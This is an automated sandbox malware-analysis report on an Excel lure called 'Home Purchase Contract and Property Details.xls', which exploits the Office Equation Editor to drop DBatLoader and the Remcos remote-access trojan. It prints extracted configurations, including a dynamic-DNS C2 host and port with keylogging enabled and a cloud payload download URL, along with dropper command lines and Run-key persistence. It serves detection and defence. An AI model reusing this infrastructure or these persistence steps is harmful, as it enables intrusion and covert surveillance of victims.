Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Home Purchase Contract and Property Details.xls

Overview

General Information

Sample name:Home Purchase Contract and Property Details.xls
Analysis ID:1446719
MD5:d9d5c1fa0851c35ace66d98089584cbe
SHA1:9fe664c1645be3bb5bd9b3f1292993f247600155
SHA256:777fe31b0202e8e5cf13a9d1d9dea155bfd6e569392714d1e8f61d20048e70ba
Tags:xls
Infos:

Detection

Remcos, DBatLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for dropped file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Remcos
Yara detected DBatLoader
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
C2 URLs / IPs found in malware configuration
Contains functionality to detect sleep reduction / modifications
Contains functionality to register a low level keyboard hook
Contains functionalty to change the wallpaper
Delayed program exit found
Document exploit detected (process start blacklist hit)
Drops PE files with a suspicious file extension
Drops PE files with benign system names
Excel sheet contains many unusual embedded objects
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Installs a global keyboard hook
Installs new ROOT certificates
Microsoft Office drops suspicious files
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Sigma detected: Equation Editor Network Connection
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: Suspicious Process Parents
Sigma detected: System File Execution Location Anomaly
Uses dynamic DNS services
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Excel Network Connections
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Suspicious Office Outbound Connections
Stores large binary data to the registry
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3172 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • WINWORD.EXE (PID: 3460 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
      • EQNEDT32.EXE (PID: 3668 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • csrss.exe (PID: 3832 cmdline: "C:\Users\user\AppData\Roaming\csrss.exe" MD5: 913C99449A29C2640D36B0D5FDF69289)
      • extrac32.exe (PID: 3912 cmdline: C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\AppData\Roaming\csrss.exe C:\\Users\\Public\\Libraries\\Efftwcmk.PIF MD5: 4D306ED01994EDF577B98FD59BF269C0)
  • Efftwcmk.PIF (PID: 1696 cmdline: "C:\Users\Public\Libraries\Efftwcmk.PIF" MD5: 913C99449A29C2640D36B0D5FDF69289)
  • Efftwcmk.PIF (PID: 920 cmdline: "C:\Users\Public\Libraries\Efftwcmk.PIF" MD5: 913C99449A29C2640D36B0D5FDF69289)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
{"Download Url": ["https://onedrive.live.com/download?resid=77E389B66C951B09%21132&authkey=!AD_QXcfalkvUogo"]}
{"Host:Port:Password": "wwsaer.duckdns.org:8533:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-9VASLD", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\lionsaretotalcontrollingtherulsofthejungletounderstandlionsarekindofjungletogetmebackonfiretogetittrueexperienc__ofhtejunglelions[1].docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x141e:$obj2: \objdata
  • 0x1408:$obj3: \objupdate
C:\ProgramData\notes\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\398EA60A.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
    • 0x141e:$obj2: \objdata
    • 0x1408:$obj3: \objupdate
    SourceRuleDescriptionAuthorStrings
    0000000C.00000002.484496833.00000000272CB000.00000040.00000800.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
    • 0x14a8:$a1: Remcos restarted by watchdog!
    • 0x1a20:$a3: %02i:%02i:%02i:%03i
    00000008.00000002.1012207860.0000000033DAB000.00000040.00000800.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
    • 0x14a8:$a1: Remcos restarted by watchdog!
    • 0x1a20:$a3: %02i:%02i:%02i:%03i
    0000000B.00000002.463489236.00000000006B2000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
        0000000C.00000002.479146346.00000000009F3000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          Click to see the 17 entries
          SourceRuleDescriptionAuthorStrings
          11.2.Efftwcmk.PIF.2c70000.0.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
            11.2.Efftwcmk.PIF.2c70000.0.raw.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
              11.2.Efftwcmk.PIF.2d220000.1.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                11.2.Efftwcmk.PIF.2d220000.1.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  11.2.Efftwcmk.PIF.2d220000.1.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                  • 0x6c4a8:$a1: Remcos restarted by watchdog!
                  • 0x6ca20:$a3: %02i:%02i:%02i:%03i
                  Click to see the 7 entries

                  Exploits

                  barindex
                  Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 94.156.67.72, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3668, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49169
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3668, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\csrss[1].exe

                  System Summary

                  barindex
                  Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49169, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3668, Protocol: tcp, SourceIp: 94.156.67.72, SourceIsIpv6: false, SourcePort: 80
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\Libraries\Efftwcmk.PIF" , CommandLine: "C:\Users\Public\Libraries\Efftwcmk.PIF" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\Efftwcmk.PIF, NewProcessName: C:\Users\Public\Libraries\Efftwcmk.PIF, OriginalFileName: C:\Users\Public\Libraries\Efftwcmk.PIF, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: "C:\Users\Public\Libraries\Efftwcmk.PIF" , ProcessId: 1696, ProcessName: Efftwcmk.PIF
                  Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Efftwcmk.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\csrss.exe, ProcessId: 3832, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Efftwcmk
                  Source: Process startedAuthor: Jason Lynch: Data: Command: "C:\Users\user\AppData\Roaming\csrss.exe" , CommandLine: "C:\Users\user\AppData\Roaming\csrss.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\csrss.exe, NewProcessName: C:\Users\user\AppData\Roaming\csrss.exe, OriginalFileName: C:\Users\user\AppData\Roaming\csrss.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3172, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\csrss.exe" , ProcessId: 3832, ProcessName: csrss.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\csrss.exe" , CommandLine: "C:\Users\user\AppData\Roaming\csrss.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\csrss.exe, NewProcessName: C:\Users\user\AppData\Roaming\csrss.exe, OriginalFileName: C:\Users\user\AppData\Roaming\csrss.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3172, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\csrss.exe" , ProcessId: 3832, ProcessName: csrss.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\AppData\Roaming\csrss.exe C:\\Users\\Public\\Libraries\\Efftwcmk.PIF, CommandLine: C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\AppData\Roaming\csrss.exe C:\\Users\\Public\\Libraries\\Efftwcmk.PIF, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\extrac32.exe, NewProcessName: C:\Windows\SysWOW64\extrac32.exe, OriginalFileName: C:\Windows\SysWOW64\extrac32.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\csrss.exe" , ParentImage: C:\Users\user\AppData\Roaming\csrss.exe, ParentProcessId: 3832, ParentProcessName: csrss.exe, ProcessCommandLine: C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\AppData\Roaming\csrss.exe C:\\Users\\Public\\Libraries\\Efftwcmk.PIF, ProcessId: 3912, ProcessName: extrac32.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\user\AppData\Roaming\csrss.exe" , CommandLine: "C:\Users\user\AppData\Roaming\csrss.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\csrss.exe, NewProcessName: C:\Users\user\AppData\Roaming\csrss.exe, OriginalFileName: C:\Users\user\AppData\Roaming\csrss.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3172, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\csrss.exe" , ProcessId: 3832, ProcessName: csrss.exe
                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Efftwcmk.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\csrss.exe, ProcessId: 3832, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Efftwcmk
                  Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 188.114.96.3, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3172, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
                  Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: "C:\Users\Public\Libraries\Efftwcmk.PIF" , CommandLine: "C:\Users\Public\Libraries\Efftwcmk.PIF" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\Efftwcmk.PIF, NewProcessName: C:\Users\Public\Libraries\Efftwcmk.PIF, OriginalFileName: C:\Users\Public\Libraries\Efftwcmk.PIF, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: "C:\Users\Public\Libraries\Efftwcmk.PIF" , ProcessId: 1696, ProcessName: Efftwcmk.PIF
                  Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3172, Protocol: tcp, SourceIp: 188.114.96.3, SourceIsIpv6: false, SourcePort: 80
                  Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3172, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                  Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3460, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                  Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\AppData\Roaming\csrss.exe" , CommandLine: "C:\Users\user\AppData\Roaming\csrss.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\csrss.exe, NewProcessName: C:\Users\user\AppData\Roaming\csrss.exe, OriginalFileName: C:\Users\user\AppData\Roaming\csrss.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3172, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\csrss.exe" , ProcessId: 3832, ProcessName: csrss.exe

                  Stealing of Sensitive Information

                  barindex
                  Source: Registry Key setAuthor: Joe Security: Data: Details: 4F 4E 5E C8 87 8C 53 B6 E6 9F 0E 9D 24 DF EF 56 32 48 F2 28 F1 5A 9E 90 AD 95 78 59 75 29 F2 B8 F0 51 1A 71 9A B4 E7 9B B5 71 91 4E 12 F2 FE FA 3D CE 90 35 F3 D1 6B 6A C5 F0 B5 4D EC 0B 7E CC 41 91 2C 9D 68 48 A8 65 FB B2 40 E2 F6 A6 D2 58 B2 A6 , EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\csrss.exe, ProcessId: 3832, TargetObject: HKEY_CURRENT_USER\Software\Rmc-9VASLD\exepath
                  No Snort rule has matched

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: http://geoplugin.net/json.gpURL Reputation: Label: phishing
                  Source: http://geoplugin.net/json.gp/CURL Reputation: Label: phishing
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\lionsaretotalcontrollingtherulsofthejungletounderstandlionsarekindofjungletogetmebackonfiretogetittrueexperienc__ofhtejunglelions[1].docAvira: detection malicious, Label: HEUR/Rtf.Malformed
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{618DEECE-5CD1-42E4-A158-87A2956FA503}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\398EA60A.docAvira: detection malicious, Label: HEUR/Rtf.Malformed
                  Source: 0000000B.00000002.463489236.00000000006B2000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "wwsaer.duckdns.org:8533:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-9VASLD", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                  Source: 8.0.csrss.exe.400000.0.unpackMalware Configuration Extractor: DBatLoader {"Download Url": ["https://onedrive.live.com/download?resid=77E389B66C951B09%21132&authkey=!AD_QXcfalkvUogo"]}
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\csrss[1].exeReversingLabs: Detection: 21%
                  Source: C:\Users\user\AppData\Roaming\csrss.exeReversingLabs: Detection: 21%
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFReversingLabs: Detection: 21%
                  Source: Yara matchFile source: 11.2.Efftwcmk.PIF.2d220000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.Efftwcmk.PIF.2d220000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.463489236.00000000006B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.479146346.00000000009F3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.473812700.000000007DBE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.1007133666.000000000077F000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: csrss.exe PID: 3832, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Efftwcmk.PIF PID: 1696, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Efftwcmk.PIF PID: 920, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\notes\logs.dat, type: DROPPED
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D73837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,8_2_33D73837
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_2D253837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,11_2_2D253837
                  Source: csrss.exe, 00000008.00000002.1012207860.0000000033DAB000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_126a8c25-0

                  Exploits

                  barindex
                  Source: Yara matchFile source: 11.2.Efftwcmk.PIF.2d220000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.Efftwcmk.PIF.2d220000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.473812700.000000007DBE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Efftwcmk.PIF PID: 1696, type: MEMORYSTR
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: unknown Port: 80Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\csrss.exeJump to behavior
                  Source: ~WRF{618DEECE-5CD1-42E4-A158-87A2956FA503}.tmp.4.drStream path '_1777979214/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                  Source: ~WRF{618DEECE-5CD1-42E4-A158-87A2956FA503}.tmp.4.drStream path '_1777979220/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                  Source: ~WRF{618DEECE-5CD1-42E4-A158-87A2956FA503}.tmp.4.drStream path '_1777979241/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                  Source: ~WRF{618DEECE-5CD1-42E4-A158-87A2956FA503}.tmp.4.drStream path '_1777979242/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                  Source: ~WRF{618DEECE-5CD1-42E4-A158-87A2956FA503}.tmp.4.drStream path '_1777979244/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.22:49171 version: TLS 1.0
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: easinvoker.pdb source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: easinvoker.pdbH source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmp
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D8E879 FindFirstFileExA,8_2_33D8E879
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D4C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,8_2_33D4C34D
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D4BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,8_2_33D4BB30
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D59AF5 FindFirstFileW,8_2_33D59AF5
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D5C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,8_2_33D5C291
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D4880C FindFirstFileW,FindNextFileW,FindClose,8_2_33D4880C
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D4783C FindFirstFileW,FindNextFileW,8_2_33D4783C
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D49665 FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_33D49665
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D4BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,8_2_33D4BD37
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_02C758B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,11_2_02C758B4

                  Software Vulnerabilities

                  barindex
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  Source: global trafficDNS query: name: qr-in.com
                  Source: global trafficDNS query: name: qr-in.com
                  Source: global trafficDNS query: name: qr-in.com
                  Source: global trafficDNS query: name: qr-in.com
                  Source: global trafficDNS query: name: qr-in.com
                  Source: global trafficDNS query: name: qr-in.com
                  Source: global trafficDNS query: name: onedrive.live.com
                  Source: global trafficDNS query: name: onedrive.live.com
                  Source: global trafficDNS query: name: onedrive.live.com
                  Source: global trafficDNS query: name: f3rtrw.bl.files.1drv.com
                  Source: global trafficDNS query: name: f3rtrw.bl.files.1drv.com
                  Source: global trafficDNS query: name: wwsaer.duckdns.org
                  Source: global trafficDNS query: name: geoplugin.net
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 13.107.137.11:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:80
